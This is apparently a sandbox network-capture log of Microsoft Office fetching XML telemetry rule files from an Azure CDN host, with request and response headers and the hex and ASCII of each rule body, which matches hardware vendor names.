                                                  2024-10-31 19:50:38 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  35192.168.2.45234713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:38 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:38 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 428
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                  ETag: "0x8DC582BAC4F34CA"
                                                  x-ms-request-id: 67fffc2c-401e-000a-5dae-264a7b000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195038Z-16849878b78zqkvcwgr6h55x9n00000009gg000000004kkg
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:38 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  36192.168.2.45234613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:38 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:38 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                  ETag: "0x8DC582B9C8E04C8"
                                                  x-ms-request-id: ebbbec6e-b01e-0021-1c83-29cab7000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195038Z-17c5cb586f64sw5wh0dfzbdtvw0000000270000000005k16
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:38 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  37192.168.2.45234913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:39 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:39 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:39 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 499
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                  ETag: "0x8DC582B98CEC9F6"
                                                  x-ms-request-id: 283bb1f9-001e-0066-5cf3-2a561e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195039Z-15b8d89586ffsjj9qb0gmb1stn0000000ea0000000000sdr
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:39 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  38192.168.2.45235013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:39 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:39 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:39 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B988EBD12"
                                                  x-ms-request-id: 546431bf-201e-0085-0b72-2734e3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195039Z-16849878b78j5kdg3dndgqw0vg0000000bsg0000000058fr
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:39 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  39192.168.2.45235213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:39 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:39 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:39 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                  ETag: "0x8DC582BB5815C4C"
                                                  x-ms-request-id: 46a88b53-101e-0017-7e74-2747c7000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195039Z-16849878b78wc6ln1zsrz6q9w800000009m000000000sq4h
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:39 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  40192.168.2.45235313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:39 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:39 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:39 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 494
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                  ETag: "0x8DC582BB8972972"
                                                  x-ms-request-id: fa11464d-701e-0032-1f49-27a540000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195039Z-16849878b78wc6ln1zsrz6q9w800000009rg0000000054ec
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:39 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  41192.168.2.45235113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:39 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:39 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:39 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB32BB5CB"
                                                  x-ms-request-id: c1e62926-201e-005d-3f75-2aafb3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195039Z-159b85dff8fj6b6xhC1DFW8qdg00000001w0000000007d98
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:39 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  42192.168.2.45235513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:40 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                  ETag: "0x8DC582B9D43097E"
                                                  x-ms-request-id: 3201f11f-301e-006e-7658-27f018000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195040Z-17c5cb586f6d5d4vksgckxyn1c00000000q0000000007wya
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:40 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  43192.168.2.45235413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:40 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 420
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                  ETag: "0x8DC582B9DAE3EC0"
                                                  x-ms-request-id: b9cb9fa3-701e-005c-6994-2abb94000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195040Z-16849878b7898p5f6vryaqvp580000000avg0000000095p9
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:40 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  44192.168.2.45235613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:40 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                  ETag: "0x8DC582BA909FA21"
                                                  x-ms-request-id: 3601e2f9-501e-0064-27bd-2a1f54000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195040Z-159b85dff8fsgrl7hC1DFWadan00000002v0000000003yp0
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:40 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  45192.168.2.45235713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:40 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                  ETag: "0x8DC582B92FCB436"
                                                  x-ms-request-id: 01fc617d-601e-000d-05a4-262618000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195040Z-16849878b78fhxrnedubv5byks00000008dg000000000t4c
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
